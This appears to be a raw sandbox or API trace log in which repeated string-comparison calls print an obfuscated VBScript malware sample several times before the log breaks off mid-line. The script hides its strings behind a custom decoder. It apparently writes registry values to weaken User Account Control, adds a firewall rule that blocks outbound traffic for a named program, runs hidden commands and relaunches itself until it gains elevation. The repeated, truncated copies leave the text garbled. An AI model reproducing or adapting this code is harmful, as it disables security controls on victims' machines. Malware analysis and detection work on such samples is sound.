bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.341] wcsncmp (_String1="= policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.341] wcsncmp (_String1=" policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.341] wcsncmp (_String1="policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0226.341] wcsncmp (_String1="olicy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.341] wcsncmp (_String1="licy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim 